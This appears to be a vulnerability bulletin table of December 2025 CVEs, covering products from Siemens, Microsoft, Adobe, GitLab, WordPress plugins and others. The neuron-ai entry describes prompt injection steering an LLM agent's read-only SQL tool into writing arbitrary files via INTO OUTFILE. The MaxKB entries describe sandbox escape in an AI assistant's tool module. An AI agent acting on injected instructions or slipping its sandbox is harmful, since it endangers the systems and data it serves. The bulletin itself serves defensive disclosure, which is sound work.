| Siemens--COMOS V10.6 | A vulnerability has been identified in COMOS V10.6 (All versions), COMOS V10.6 (All versions), JT Bi-Directional Translator for STEP (All versions), NX V2412 (All versions < V2412.8900 with Cloud Entitlement (bundled as NX X)), NX V2506 (All versions < V2506.6000 with Cloud Entitlement (bundled as NX X)), Simcenter 3D (All versions < V2506.6000 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Femap (All versions < V2506.0002 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Studio (All versions), Simcenter System Architect (All versions), Tecnomatix Plant Simulation (All versions < V2504.0007). The SALT SDK is missing server certificate validation while establishing TLS connections to the authorization server. This could allow an attacker to perform a man-in-the-middle attack. | 2025-12-09 | 8.1 | CVE-2025-40801 | https://cert-portal.siemens.com/productcert/html/ssa-710408.html https://cert-portal.siemens.com/productcert/html/ssa-212953.html |
| Siemens--SIMATIC CN 4100 | A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected application do not properly validate input parameters in its REST API, resulting in improper handling of unexpected arguments. This could allow an authenticated attacker to execute arbitrary code with limited privileges. | 2025-12-09 | 8.3 | CVE-2025-40937 | https://cert-portal.siemens.com/productcert/html/ssa-416652.html |
| Siemens--SIMATIC CN 4100 | A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected device stores sensitive information in the firmware. This could allow an attacker to access and misuse this information, potentially impacting the device's confidentiality, integrity, and availability. | 2025-12-09 | 8.1 | CVE-2025-40938 | https://cert-portal.siemens.com/productcert/html/ssa-416652.html |
| SAP_SE--SAP Web Dispatcher and Internet Communication Manager (ICM) | SAP Web Dispatcher and ICM may expose internal testing interfaces that are not intended for production. If enabled, unauthenticated attackers could exploit them to access diagnostics, send crafted requests, or disrupt services. This vulnerability has a high impact on confidentiality, availability and low impact on integrity and of the application. | 2025-12-09 | 8.2 | CVE-2025-42878 | https://me.sap.com/notes/3684682 https://url.sap/sapsecuritypatchday |
| TeamViewer--DEX | A vulnerability in TeamViewer DEX Client (former 1E client) - Content Distribution Service (NomadBranch.exe) prior version 25.11 for Windows allows malicious actors to bypass file integrity validation via a crafted request. By providing a valid hash for a malicious file, an attacker can cause the service to incorrectly validate and process the file as trusted, enabling arbitrary code execution under the Nomad Branch service context. | 2025-12-11 | 8.8 | CVE-2025-44016 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1005/ |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. A high privileged attacker could exploit this vulnerability by providing maliciously crafted serialized data to the application. Exploitation of this issue requires user interaction and scope is changed. | 2025-12-09 | 8.4 | CVE-2025-61810 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. A high privileged attacker could leverage this vulnerability to bypass security measures and execute malicious code. Exploitation of this issue does not require user interaction and scope is changed. | 2025-12-09 | 8.4 | CVE-2025-61811 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Input Validation vulnerability that could allow a high privileged attacker to gain arbitrary code execution. Exploitation of this issue does not require user interaction. | 2025-12-09 | 8.4 | CVE-2025-61812 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files on the server. Exploitation of this issue does not require user interaction and scope is changed. | 2025-12-09 | 8.2 | CVE-2025-61813 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Microsoft--Windows 11 Version 25H2 | Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to execute code over a network. | 2025-12-09 | 8.8 | CVE-2025-62456 | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Untrusted pointer dereference in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to execute code over a network. | 2025-12-09 | 8.8 | CVE-2025-62549 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability |
| Microsoft--Azure Monitor | Out-of-bounds write in Azure Monitor Agent allows an authorized attacker to execute code over a network. | 2025-12-09 | 8.8 | CVE-2025-62550 | Azure Monitor Agent Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office LTSC 2024 | Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally. | 2025-12-09 | 8.4 | CVE-2025-62554 | Microsoft Office Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office LTSC 2024 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. | 2025-12-09 | 8.4 | CVE-2025-62557 | Microsoft Office Remote Code Execution Vulnerability |
| Microsoft--GitHub Copilot Plugin for JetBrains IDEs | Improper neutralization of special elements used in a command ('command injection') in Copilot allows an unauthorized attacker to execute code locally. | 2025-12-09 | 8.4 | CVE-2025-64671 | GitHub Copilot for Jetbrains Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Server Subscription Edition | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2025-12-09 | 8.8 | CVE-2025-64672 | Microsoft SharePoint Server Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to execute code over a network. | 2025-12-09 | 8.8 | CVE-2025-64678 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability |
| Huawei--HarmonyOS | Input verification vulnerability in the compression and decompression module. Impact: Successful exploitation of this vulnerability may affect app data integrity. | 2025-12-08 | 8.4 | CVE-2025-66324 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the network management module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 8.4 | CVE-2025-66328 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. In versions 2.3.1 and below, the tool module allows an attacker to escape the sandbox environment and escalate privileges under certain concurrent conditions. This issue is fixed in version 2.4.0. | 2025-12-11 | 8.8 | CVE-2025-66419 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-f9qm-2pxq-fx6c https://github.com/1Panel-dev/MaxKB/commit/f8ada9a110c4dbef8c3c2636c78847ecd621ece7 https://github.com/1Panel-dev/MaxKB/releases/tag/v2.4.0 |
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. Versions 2.3.1 and below have improper file permissions which allow attackers to overwrite the built-in dynamic linker and other critical files, potentially resulting in privilege escalation. This issue is fixed in version 2.4.0. | 2025-12-11 | 8.8 | CVE-2025-66446 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-5xx2-3q9w-jpgf https://github.com/1Panel-dev/MaxKB/releases/tag/v2.4.0 |
| MasaCMS--MasaCMS | Masa CMS is an open source Enterprise Content Management platform. Versions 7.2.8 and below, 7.3.1 through 7.3.13, 7.4.0-alpha.1 through 7.4.8 and 7.5.0 through 7.5.1 are vulnerable to XSS when an unsanitized value of the ajax URL query parameter is directly included within the <head> section of the HTML page. An attacker can execute arbitrary scripts in the context of the user's session, potentially leading to Session Hijacking, Data Theft, Defacement and Malware Distribution. This issue is fixed in versions 7.5.2, 7.4.9, 7.3.14, and 7.2.9. To work around this issue, configure a Web Application Firewall (WAF) rule (e.g., ModSecurity) to block requests containing common XSS payload characters in the ajax query parameter. Alternatively, implement server-side sanitization using middleware to strip or escape dangerous characters from the ajax parameter before it reaches the vulnerable rendering logic. | 2025-12-12 | 8.2 | CVE-2025-66492 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-249c-vqwv-43vc https://github.com/MasaCMS/MasaCMS/commit/376c27196b1e2489888b7a000cdf5c45bb85959e |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions 3.6.13 and below and versions 3.7.0 through 3.7.4, contain unsafe untar code that handles symbolic links in archives. Concretely, the computation of a link's target and the subsequent check are flawed. An attacker can overwrite the file /var/run/argo/argoexec with a script of their choice, which would be executed at the pod's start. The patch deployed against CVE-2025-62156 is ineffective against malicious archives containing symbolic links. This issue is fixed in versions 3.6.14 and 3.7.5. | 2025-12-09 | 8.1 | CVE-2025-66626 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-xrqc-7xgx-c9vh https://github.com/argoproj/argo-workflows/commit/6b92af23f35aed4d4de8b04adcaf19d68f006de1 https://github.com/advisories/GHSA-p84v-gxvw-73pf https://github.com/argoproj/argo-workflows/blob/5291e0b01f94ba864f96f795bb500f2cfc5ad799/workflow/executor/executor.go#L1034-L1037 |
| wasmi-labs--wasmi | Wasmi is a WebAssembly interpreter focused on constrained and embedded systems. In versions 0.41.0, 0.41.1, 0.42.0 through 0.47.1, 0.50.0 through 0.51.2 and 1.0.0, Wasmi's linear memory implementation leads to a Use After Free vulnerability, triggered by a WebAssembly module under certain memory growth conditions. This issue potentially leads to memory corruption, information disclosure, or code execution. This issue is fixed in versions 0.41.2, 0.47.1, 0.51.3 and 1.0.1. To workaround this issue, consider limiting the maximum linear memory sizes where feasible. | 2025-12-09 | 8.4 | CVE-2025-66627 | https://github.com/wasmi-labs/wasmi/security/advisories/GHSA-g4v2-cjqp-rfmq |
| zitadel--zitadel | ZITADEL is an open-source identity infrastructure tool. Versions 4.0.0-rc.1 through 4.7.0 are vulnerable to DOM-Based XSS through the Zitadel V2 logout endpoint. The /logout endpoint insecurely routes to a value that is supplied in the post_logout_redirect GET parameter. As a result, unauthenticated remote attacker can execute malicious JS code on Zitadel users' browsers. To carry out an attack, multiple user sessions need to be active in the same browser, however, account takeover is mitigated when using Multi-Factor Authentication (MFA) or Passwordless authentication. This issue is fixed in version 4.7.1. | 2025-12-09 | 8 | CVE-2025-67495 | https://github.com/zitadel/zitadel/security/advisories/GHSA-v959-qxv6-6f8p https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96 |
| okta--okta-sdk-java | Okta Java Management SDK facilitates interactions with the Okta management API. In versions 11.0.0 through 20.0.0, race conditions may arise from concurrent requests using the ApiClient class. This could cause a status code or response header from one request's response to influence another request's response. This issue is fixed in version 20.0.1. | 2025-12-10 | 8.4 | CVE-2025-67505 | https://github.com/okta/okta-sdk-java/security/advisories/GHSA-j5gq-897m-2rff https://github.com/okta/okta-sdk-java/commit/abf4f128a0441f90cb7efcdcf4bde1aef8703243 |
| filamentphp--filament | Filament is a collection of full-stack components for accelerated Laravel development. Versions 4.0.0 through 4.3.0 contain a flaw in the handling of recovery codes for app-based multi-factor authentication, allowing the same recovery code to be reused indefinitely. This issue does not affect email-based MFA. It also only applies when recovery codes are enabled. This issue is fixed in version 4.3.1. | 2025-12-10 | 8.1 | CVE-2025-67507 | https://github.com/filamentphp/filament/security/advisories/GHSA-pvcv-q3q7-266g https://github.com/filamentphp/filament/commit/87ff60ad9b6e16d4e14ee36a220b8917dd7b0815 |
| neuron-core--neuron-ai | Neuron is a PHP framework for creating and orchestrating AI Agents. Versions 2.8.11 and below use MySQLSelectTool, which is vulnerable to Read-Only Bypass. MySQLSelectTool is intended to be a read-only SQL tool (e.g., for LLM agent querying, however, validation based on the first keyword (e.g., SELECT) and a forbidden-keyword list does not block file-writing constructs such as INTO OUTFILE / INTO DUMPFILE. As a result, an attacker who can influence the tool input (e.g., via prompt injection through a public agent endpoint) may write arbitrary files to the DB server if the MySQL/MariaDB account has the FILE privilege and server configuration permits writes to a useful location (e.g., a web-accessible directory). This issue is fixed in version 2.8.12. | 2025-12-10 | 8.2 | CVE-2025-67509 | https://github.com/neuron-core/neuron-ai/security/advisories/GHSA-j8g6-5gqc-mq36 https://github.com/neuron-core/neuron-ai/commit/72735d0ea133266cf2f5d5d195d41e9dd865289a https://github.com/neuron-core/neuron-ai/releases/tag/2.8.12 |
| Webmin--Webmin | squid/cachemgr.cgi in Webmin before 2.600 does not properly quote arguments. This is relevant if Webmin's Squid module and its Cache Manager feature are available, and an untrusted party is able to authenticate to Webmin and has certain Cache Manager permissions (the "cms" security option). | 2025-12-11 | 8.5 | CVE-2025-67738 | https://github.com/webmin/webmin/commit/1a52bf4d72f9da6d79250c66e51f41c6f5b880ee https://github.com/webmin/webmin/compare/2.520...2.600 |
| Flow-Scanner--lightning-flow-scanner | Lightning Flow Scanner provides a A CLI plugin, VS Code Extension and GitHub Action for analysis and optimization of Salesforce Flows. Versions 6.10.5 and below allow a maliciously crafted flow metadata file to cause arbitrary JavaScript execution during scanning. The APIVersion rule uses new Function() to evaluate expression strings, enabling an attacker to supply a malicious expression within rule configuration or crafted flow metadata. This could compromise developer machines, CI runners, or editor environments. This issue is fixed in version 6.10.6. | 2025-12-12 | 8.4 | CVE-2025-67750 | https://github.com/Flow-Scanner/lightning-flow-scanner/security/advisories/GHSA-55jh-84jv-8mx8 https://github.com/Flow-Scanner/lightning-flow-scanner/commit/10f64a5eb193d8a777e453b25e910144e4540795 https://github.com/Flow-Scanner/lightning-flow-scanner/releases/tag/core-v6.10.6 |
| NXLog--NXLog Agent | NXLog Agent before 6.11 can load a file specified by the OPENSSL_CONF environment variable. | 2025-12-14 | 8.1 | CVE-2025-67900 | https://docs.nxlog.co/agent/current/release-notes.html#nxlog-agent-6-11 |
| N/A--Vuetify | The Preset configuration https://v2.vuetifyjs.com/en/features/presets feature of Vuetify is vulnerable to Prototype Pollution https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html due to the internal 'mergeDeep' utility function used to merge options with defaults. Using a specially-crafted, malicious preset can result in polluting all JavaScript objects with arbitrary properties, which can further negatively affect all aspects of the application's behavior. This can lead to a wide range of security issues, including resource exhaustion/denial of service or unauthorized access to data. If the application utilizes Server-Side Rendering (SSR), this vulnerability could affect the whole server process. This issue affects Vuetify versions greater than or equal to 2.2.0-beta.2 and less than 3.0.0-alpha.10. Note: Version 2.x of Vuetify is End-of-Life and will not receive any updates to address this issue. For more information see here https://v2.vuetifyjs.com/en/about/eol/ . | 2025-12-12 | 8.6 | CVE-2025-8083 | https://www.herodevs.com/vulnerability-directory/cve-2025-8083 https://codepen.io/herodevs/pen/RNWoaQM/f1f4ccc7e6a307c2a8c36d948ba14755 |
| GitLab--GitLab | GitLab has remediated a security issue in GitLab CE/EE affecting all versions from 17.1 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to perform unauthorized actions on behalf of other users by injecting malicious HTML into vulnerability code flow displays. | 2025-12-11 | 8.7 | CVE-2025-8405 | GitLab Issue #558214 HackerOne Bug Bounty Report #3270940 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). During the Dynamic DNS configuration of the affected product it is possible to inject additional configuration parameters. Under certain circumstances, an attacker could leverage this vulnerability to spawn a reverse shell and gain root access on the affected system. | 2025-12-09 | 7.5 | CVE-2024-56836 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). Due to the insufficient validation during the installation and load of certain configuration files of the affected device, an attacker could spawn a reverse shell and gain root access on the affected system. | 2025-12-09 | 7.2 | CVE-2024-56837 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). The SCEP client available in the affected device for secure certificate enrollment lacks validation of multiple fields. An attacker could leverage this scenario to execute arbitrary code as root user. | 2025-12-09 | 7.2 | CVE-2024-56838 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). Code injection can be achieved when the affected device is using VRF (Virtual Routing and Forwarding). An attacker could leverage this scenario to execute arbitrary code as root user. | 2025-12-09 | 7.2 | CVE-2024-56839 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). Under certain conditions, IPsec may allow code injection in the affected device. An attacker could leverage this scenario to execute arbitrary code as root user. | 2025-12-09 | 7.2 | CVE-2024-56840 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| SPA-Cart--SPA-CART CMS | SPA-CART CMS 1.9.0.3 contains a stored cross-site scripting vulnerability in the product description parameter that allows authenticated administrators to inject malicious scripts. Attackers can submit JavaScript payloads through the 'descr' parameter in the product edit form to execute arbitrary code in administrative users' browsers. | 2025-12-11 | 7.5 | CVE-2024-58304 | ExploitDB-51919 VulnCheck Advisory: SPA-CART CMS 1.9.0.3 Stored Cross-Site Scripting via Product Description |
| PuneethReddyHC--online-shopping-system-advanced | Online Shopping System Advanced 1.0 contains a SQL injection vulnerability in the payment_success.php script that allows attackers to inject malicious SQL through the unfiltered 'cm' parameter. Attackers can exploit the vulnerability by sending crafted SQL queries to retrieve sensitive database information by manipulating the user ID parameter. | 2025-12-12 | 7.5 | CVE-2024-58316 | ExploitDB-51811 Product GitHub Repository VulnCheck Advisory: Online Shopping System Advanced 1.0 SQL Injection via Payment Success Parameter |
| NomySoft Information Technology Training and Consulting Inc.--Nomysem | Incorrect Use of Privileged APIs vulnerability in NomySoft Information Technology Training and Consulting Inc. Nomysem allows Privilege Escalation. This issue affects Nomysem: through May 2025. | 2025-12-10 | 7.1 | CVE-2025-1161 | https://www.usom.gov.tr/bildirim/tr-25-0440 |
| Lenovo--App Store | A DLL hijacking vulnerability was reported in the Lenovo App Store and Lenovo Browser applications that could allow a local authenticated user to execute code with elevated privileges under certain conditions. | 2025-12-10 | 7.8 | CVE-2025-12046 | https://iknow.lenovo.com.cn/detail/435004 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 11.10 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an unauthenticated user to create a denial of service condition by sending crafted GraphQL queries that bypass query complexity limits. | 2025-12-11 | 7.5 | CVE-2025-12562 | GitLab Issue #579152 HackerOne Bug Bounty Report #3360710 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| radykal--Fancy Product Designer | The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 6.4.8 due to insufficient input sanitization and output escaping in the data-to-image.php and pdf-to-image.php files. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2025-12-12 | 7.2 | CVE-2025-12570 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2db4eb1d-3a82-4f0f-b4ff-a291b0289b7f?source=cve https://codecanyon.net/item/fancy-product-designer-woocommercewordpress/6318393 |
| widgetpack--Reviews Widget for Google, Yelp & Recommendations | The Social Reviews & Recommendations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in the 'trim_text' function in all versions up to, and including, 2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 2.5. | 2025-12-09 | 7.2 | CVE-2025-12705 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6d2aa302-aaab-4bf1-9a79-144290b967de?source=cve https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L447 https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L449 https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L452 https://plugins.trac.wordpress.org/changeset/3393291/ https://plugins.trac.wordpress.org/changeset/3406362/ |
| Aksis Computer Services and Consulting Inc.--AxOnboard | Authorization Bypass Through User-Controlled Key vulnerability in Aksis Computer Services and Consulting Inc. AxOnboard allows Exploitation of Trusted Identifiers. This issue affects AxOnboard: from 3.2.0 before 3.3.0. | 2025-12-11 | 7.6 | CVE-2025-13003 | https://www.usom.gov.tr/bildirim/tr-25-0446 |
| payamito-- () payamito sms woocommerce | The افزونه پیامک ووکامرس فوق حرفه ای (جدید) payamito sms woocommerce plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'columns' parameter in all versions up to, and including, 1.3.5. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-13 | 7.5 | CVE-2025-13077 | https://www.wordfence.com/threat-intel/vulnerabilities/id/75de6387-fac7-403d-9e6c-89570658d978?source=cve https://plugins.trac.wordpress.org/browser/payamito-sms-woocommerce/tags/1.3.5/includes/core/payamito-core/admin/class-payamito-admin.php#L64 https://plugins.trac.wordpress.org/browser/payamito-sms-woocommerce/tags/1.3.5/includes/core/payamito-core/includes/class-db.php#L64 https://owasp.org/www-community/attacks/SQL_Injection |
| listingthemes--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'hide_fields' and the 'attr_search' parameter in all versions up to, and including, 1.4.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-13 | 7.5 | CVE-2025-13089 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b0696cbe-70e0-402d-bcfd-40907a973785?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412635%40wpdirectorykit&new=3412635%40wpdirectorykit&sfp_email=&sfph_mail= |
| Netiket Information Technologies Ltd. Co.--ApplyLogic | Authorization Bypass Through User-Controlled Key vulnerability in Netiket Information Technologies Ltd. Co. ApplyLogic allows Exploitation of Trusted Identifiers. This issue affects ApplyLogic: through 01.12.2025. | 2025-12-11 | 7.6 | CVE-2025-13124 | https://www.usom.gov.tr/bildirim/tr-25-0447 |
| tomdever--wpForo Forum | The wpForo Forum plugin for WordPress is vulnerable to generic SQL Injection via the `post_args` and `topic_args` parameters in all versions up to, and including, 2.4.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-14 | 7.5 | CVE-2025-13126 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fd1704ef-e259-40a3-974b-128145bc8a4a?source=cve https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/classes/Topics.php?rev=3386327#L1641 https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/classes/Posts.php?rev=3386327#L633 https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/widgets/RecentTopics.php?rev=3386327#L117 https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/widgets/RecentPosts.php?rev=3386327#L177 |
| Lenovo--One Client | A potential DLL hijacking vulnerability was reported in Lenovo One Client during an internal security assessment that could allow a local authenticated user to execute code with elevated privileges. | 2025-12-10 | 7.8 | CVE-2025-13152 | https://iknow.lenovo.com.cn/detail/435007 https://one.lenovo.com/ |
| Lenovo--Baiying Client | An improper permissions vulnerability was reported in Lenovo Baiying Client that could allow a local authenticated user to execute code with elevated privileges. | 2025-12-10 | 7.8 | CVE-2025-13155 | https://iknow.lenovo.com.cn/detail/435005 |
| IBM--Aspera Orchestrator | IBM Aspera Orchestrator 4.0.0 through 4.1.0 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify, or delete information in the back-end database. | 2025-12-11 | 7.6 | CVE-2025-13214 | https://www.ibm.com/support/pages/node/7254434 |
| hippooo--Hippoo Mobile App for WooCommerce | The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.1 via the template_redirect() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. | 2025-12-10 | 7.5 | CVE-2025-13339 | https://www.wordfence.com/threat-intel/vulnerabilities/id/06900b4b-6607-4b25-b4bc-2e2906160421?source=cve https://plugins.trac.wordpress.org/changeset/3412701/ |
| cleantalk--Login Security, FireWall, Malware removal by CleanTalk | The Login Security, FireWall, Malware removal by CleanTalk plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the page URL in all versions up to, and including, 2.168 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-09 | 7.2 | CVE-2025-13604 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1e35eb83-716e-4177-99ba-24a884725265?source=cve https://plugins.trac.wordpress.org/browser/security-malware-firewall/tags/2.168/inc/spbc-settings.php#L2342 |
| Ivanti--Endpoint Manager | Path traversal in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote authenticated attacker to write arbitrary files outside of the intended directory. User interaction is required. | 2025-12-09 | 7.1 | CVE-2025-13661 | https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024 |
| Ivanti--Endpoint Manager | Improper verification of cryptographic signatures in the patch management component of Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary code. User Interaction is required. | 2025-12-09 | 7.8 | CVE-2025-13662 | https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024 |
| cvedovini--LT Unleashed | The LT Unleashed plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.1 via the 'template' parameter in the `book` shortcode due to insufficient path sanitization. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where files such as wp-config.php can be included. | 2025-12-12 | 7.5 | CVE-2025-13886 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c72099cc-e70a-4afe-92c0-8f9f8c1e91b7?source=cve https://plugins.trac.wordpress.org/browser/lt-unleashed/trunk/lt-unleashed.php#L315 https://plugins.trac.wordpress.org/browser/lt-unleashed/tags/1.1.1/lt-unleashed.php#L315 https://plugins.trac.wordpress.org/browser/lt-unleashed/trunk/lt-unleashed.php#L241 |
| qdonow--WPNakama Team and multi-Client Collaboration, Editorial and Project Management | The WPNakama plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 0.6.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-12 | 7.5 | CVE-2025-14068 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9abfd0f5-f665-4745-9756-8445ddbdc29d?source=cve https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama.php#L197 https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.3/inc/class-wpnakama.php#L197 https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama-api.php#L206 https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.3/inc/class-wpnakama-api.php#L206 https://cwe.mitre.org/data/definitions/89.html https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412904%40wpnakama&new=3412904%40wpnakama&sfp_email=&sfph_mail= |
| amans2k--FunnelKit Funnel Builder for WooCommerce Checkout | The FunnelKit - Funnel Builder for WooCommerce Checkout plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'opid' parameter in all versions up to, and including, 3.13.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-12 | 7.5 | CVE-2025-14169 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fb19f920-0fd0-491e-9e87-62c828cad9b9?source=cve https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.5/modules/optins/admin/db/class-wffn-db-optin.php#L79 https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.5/modules/optins/merge-tags/class-bwf-optin-tags.php#L126 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3415550%40funnel-builder%2Ftrunk&old=3414128%40funnel-builder%2Ftrunk&sfp_email=&sfph_mail= |
